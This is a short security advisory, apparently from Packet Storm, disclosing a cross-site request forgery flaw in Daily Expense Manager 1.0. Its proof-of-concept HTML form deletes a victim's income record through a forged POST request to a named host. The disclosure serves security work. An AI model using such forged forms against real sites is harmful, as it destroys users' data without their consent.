Daily Expense Manager 1.0 Cross Site Request Forgery

Daily Expense Manager version 1.0 suffers from a cross site request forgery vulnerability.


MD5 | aacd6389e460b3f72eeb1843b91f5b1f

Download
# Exploit Title: Daily Expense Manager - CSRF (Delete Income)
# Exploit Author: Mr Winst0n
# Author E-mail: [email protected]
# Discovery Date: August 8, 2019
# Vendor Homepage: https://sourceforge.net/projects/daily-expense-manager/
# Tested Version: 1.0
# Tested on: Parrot OS


# PoC:

<html>
<body>
  <form action="http://expense.adminspoint.com/homeedit.php?delincome=778" method="post">
    <input type="submit" value="Click!" />
  </form>
</body>
</html>

Source: packetstormsecurity.com
Related Posts